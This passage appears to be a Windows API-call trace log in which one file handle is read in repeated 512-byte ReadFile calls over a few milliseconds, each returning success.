	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.086] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.087] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.088] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
